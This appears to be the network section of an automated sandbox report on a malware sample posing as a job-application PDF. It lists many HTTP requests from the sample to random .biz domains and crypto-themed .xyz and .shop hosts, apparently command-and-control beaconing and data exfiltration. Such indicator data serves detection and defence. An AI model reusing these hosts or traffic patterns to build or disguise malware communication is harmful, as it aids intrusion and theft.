            Source: global trafficHTTP traffic detected: POST /gtynebhqjtfhfyti HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /gwo6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.stakemask.xyzOrigin: http://www.stakemask.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 6476Referer: http://www.stakemask.xyz/gwo6/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /nsiowb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /wilwdphot HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /dielwuec HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: GET /gwo6/?46X=MBEKEv0ugpgWX2jua16KbRtCIB3s6ka+zKgBsYRR8c9E1EzqhBu48/qzeTOQx3bSOlhdcb/rXf0aputkyH2GEaaTMgSCSx6h1rRpE7wz+fc0QC+fndBMDtU=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.stakemask.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /efa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /wikgynrmq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /k HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /pu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /leke HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /lruowqsqbbhjst HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /bguu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.agistaking.xyzOrigin: http://www.agistaking.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 200Referer: http://www.agistaking.xyz/bguu/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /clxidyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /scwfgxpswwm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /bguu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.agistaking.xyzOrigin: http://www.agistaking.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 220Referer: http://www.agistaking.xyz/bguu/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /rm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /bguu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.agistaking.xyzOrigin: http://www.agistaking.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 6476Referer: http://www.agistaking.xyz/bguu/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /euqkiqexqwire HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /vxnki HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /pcbfvhpbspy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /h HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /fyd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: GET /bguu/?46X=wpZ2zrhVCI3JLgG0fmBBss6LPjHlWe1w/JFFDzKF+V7h32CQ3OMTdOkGE8NCHKIXe6YEJzSxYnSm/JZ2Z7T7gNAl4zG8Smso5QFplpDKnUXP2BcIMSrtmpg=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.agistaking.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /cueli HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /vrftxcnuewhr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /qgqk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /chhwy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /qwntabomhiahkoo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /gtxayuiasljqa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /gtvh/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.leadmagnetkpis.shopOrigin: http://www.leadmagnetkpis.shopCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 200Referer: http://www.leadmagnetkpis.shop/gtvh/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /jgucgeru HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /wrdd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /mgenjbptihakc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /gtvh/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.leadmagnetkpis.shopOrigin: http://www.leadmagnetkpis.shopCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 220Referer: http://www.leadmagnetkpis.shop/gtvh/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /ktk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /tpy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /fu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /bgndyybsgbni HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /gtvh/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.leadmagnetkpis.shopOrigin: http://www.leadmagnetkpis.shopCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 6476Referer: http://www.leadmagnetkpis.shop/gtvh/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /adtqfuvotedmj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /gdlwyaldunyx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: GET /gtvh/?46X=svsS4k9aWb1fxOJWFdqD4ZHZO8ProC7QnMiFRAA+Jn47YSp+JrMAdMKfG3E9ev5xwfTou5frDELSSoA0/vSCvrqCDlCfzUQB/UWtrKGfrZiks1Cnj9TArQE=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.leadmagnetkpis.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /9x20/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.publicblockchain.xyzOrigin: http://www.publicblockchain.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 200Referer: http://www.publicblockchain.xyz/9x20/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /9x20/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.publicblockchain.xyzOrigin: http://www.publicblockchain.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 220Referer: http://www.publicblockchain.xyz/9x20/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /9x20/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.publicblockchain.xyzOrigin: http://www.publicblockchain.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 6476Referer: http://www.publicblockchain.xyz/9x20/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /9x20/?46X=lomPZfbkX5/Tg+6jmw8dyMDkjP4NXk0abi78pjf9+/jRa8r0UKnkgOsbdV67hnlDhoKnZ5+zibRYdRwwM6kGhJJ3GpxF1D+e7zNnDN/YPp88POfC8mTtY1w=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.publicblockchain.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_004722EE
            Source: global trafficHTTP traffic detected: GET /gymegolihltgvcqo?usid=24&utid=11154195932 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
            Source: global trafficHTTP traffic detected: GET /aosibypyx?usid=24&utid=11154196211 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
            Source: global trafficHTTP traffic detected: GET /j422/?46X=FUOfllrMHRVlL2mP9dpFtlJ7w5e63t2rBG4iChoHy9jO0xa6Gzw56eLBxdOIk/dIKvPqMZj+oWY7sauAPMCxWZArGu+MyfyU7LQKnbq/Om18e125mnYqe98=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.minimalbtc.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /pyxq/?46X=voi6TgACTnyN5gbZYmU17u0h/VvpkraiSkSL1M3zbYGOCvXanSp74LpL3h0aAKQshQlyQ1kby8ogou9zAffBNKdsiowaI9GRahkqR5DXE2LnsscTpBmnflg=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.deepwork.cafeConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /iynbmylcmibn?usid=24&utid=11154212164 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz
            Source: global trafficHTTP traffic detected: GET /4udu/?46X=QPOxO2JOSBeIkdRIJ7kHfEfpa4SAwF/WxXvhpqosjTHM3PFGv2TE4R55nnK/GVLmYbqeoCZ32Sz0NtXBeMrpNSAZ0hCamPuf4pMsJIkclL+7GyT0E55kVqE=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.dresses-executive.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /7bzp/?46X=aR6WdwHaaPmew49IGl9c2CyrORGhdUxKRjpfDDDEmaIVpXDnsjMmJ0s7T5q7/mJAEyjBMk5h7mx5tXd7udb6EMTlIvch2q9+PHlpJuVOHss5uOhsYNovhdM=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.dappbtc.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
